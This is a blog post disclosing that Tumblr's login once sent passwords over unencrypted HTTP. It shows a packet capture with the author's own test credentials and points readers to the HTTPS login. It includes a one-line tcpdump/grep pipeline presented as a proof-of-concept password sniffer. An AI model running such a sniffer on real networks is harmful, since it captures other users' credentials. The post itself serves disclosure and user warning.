The Problem
before you read this, know there’s a solution, and a secure way to login!
I’m playing with some tumblr stuff, when I saw that you had to POST to a non-HTTPs URL. Curious, I checked the web interface. Not an s in sight ( or shall I say site? ).
See for yourself! Here’s my session:
# tcpdump host tumblr.com -A > dump
The output? I’m snipping only the first packets.
00:31:50.114587 IP loki.40826 > 82.ee.78ae.static.theplanet.com.www: Flags [S], seq 837835235, win 5840, options [mss 1460,sackOK,TS val 74876566 ecr 0,nop,wscale 6], length 0
E...u@.@..=…e.x…z.P1.Y……….~………
.v……….
00:31:50.171209 IP 82.ee.78ae.static.theplanet.com.www > loki.40826: Flags [S.], seq 4227640120, ack 837835236, win 5792, options [mss 1460,sackOK,TS val 1707915338 ecr 74876566,nop,wscale 7], length 0
E....@.0….x…..e.P.z…81.Y…..VO………
e..J.v……
00:31:50.171231 IP loki.40826 > 82.ee.78ae.static.theplanet.com.www: Flags [.], ack 1, win 92, options [nop,nop,TS val 74876580 ecr 1707915338], length 0
E..4.v@.@..D…e.x…z.P1.Y….9….Q…..
.v..e..J
00:31:50.171285 IP loki.40826 > 82.ee.78ae.static.theplanet.com.www: Flags [P.], seq 1:892, ack 1, win 92, options [nop,nop,TS val 74876580 ecr 1707915338], length 891
E….w@.@……e.x…z.P1.Y….9……….
.v..e..JPOST /login HTTP/1.1
Host: www.tumblr.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: chrome://global/locale/intl.properties
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tumblr.com/login
Cookie: __qca=P0-1420853879-1284124906103; tmgioct=BAewmVEkOJLKWMzD3hOtaO58; __utma=189990958.1074509574.1289975502.1291266642.1291266971.26; __utmz=189990958.1291262948.24.20.utmcsr=assets.tumblr.com|utmccn=(referral)|utmcmd=referral|utmcct=/iframe.html; logged_in=0; __utmb=189990958.28.10.1291266971; __utmc=189990958
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
email=paultag%40gmail.com&password=THISISATEST00:31:50.262046 IP 82.ee.78ae.static.theplanet.com.www > loki.40826: Flags [.], ack 892, win 60, options [nop,nop,TS val 1707915433 ecr 74876580], length 0
E..4.L@.0..o.x…..e.P.z…91.]_……….
e….v..
Wait, shit. What?
Let me got back and highlight the relevant part.
email=paultag%40gmail.com&password=THISISATEST
Crap.
I’ve totally been using this at my University, and I know for a fact that it’s not hard to drop a network interface into promiscuous mode. There goes my old tumblr password.
Here’s a proof of concept exploit:
# tcpdump host tumblr.com -A | tr "&" "\n" | sed "s/=/: /g" | grep password
This will work through all the packets that the kernel passes out. If you know what you’re doing ( and I really really do not ( and will not ) go into how to do this ), you can snoop all the packets that get sent to your network interface.
Solution ( via tumblr support )
So, what can you do to avoid all this? I asked Tumblr support, and they told me that they’re working on ramping up capacity for the SSL server. In the meantime, you can log in via the secure login. Please use it. I don’t want to see your passwords.
Those paying attention will notice the HTTP + SSL URL. For those who did not see the href above, the URL is:
https://www.tumblr.com/login
and not:
http://www.tumblr.com/login
BTW, tumblr support rocks so much.